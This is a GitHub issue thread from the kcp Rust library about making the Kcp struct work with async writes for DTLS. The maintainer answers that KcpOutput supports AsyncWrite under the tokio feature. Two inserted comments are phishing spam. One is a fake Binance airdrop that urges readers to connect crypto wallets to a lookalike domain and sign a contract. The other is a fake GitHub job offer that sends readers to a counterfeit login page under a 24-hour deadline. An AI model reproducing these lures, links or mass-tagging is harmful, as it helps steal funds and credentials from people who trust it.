### ISSUE TITLE
Async write for Kcp Struct

### ISSUE THREAD

**Issue by stevefan1999-personal** [Matrix-Zhang/kcp#12]
Currently Kcp struct requires Write which makes integration with DTLS a little hard (since `send_to` is async rather than sync) so what can we do to deal with this situation?

**Comment by zonyitoo** [comment]
https://github.com/zonyitoo/tokio-tfo

**Comment by DavidGhedini** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @shouse, @RbkGh, @devinterx, @jsmjsm, @zdmc23, @TANAWATTHITIWIT, @Mulander-J

**Comment by thangtq-pionero** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
THECRAZEDPOTATTO, @hartex, @jbowen93, @victorelec14, @jf-li00, @udit-gulati, @0xRaduan, @kulemantu, @yenwel, @Alexfilus, @0x416e746f6e, @amintalebi, @St0nersdash, @glihm, @Kada-quantum, @smarthug, @0xwhatly, @AndrewSpittlemeister, @AppServiceProvider, @blablalf

**Comment by zonyitoo** [comment]
https://github.com/Matrix-Zhang/kcp/blob/58e863fcbdf4cdd0df9e9c378a864dd4d0c8f58f/src/kcp.rs#L155-L185

`KcpOutput` now supports `AsyncWrite` with `feature = "tokio"` enabled.
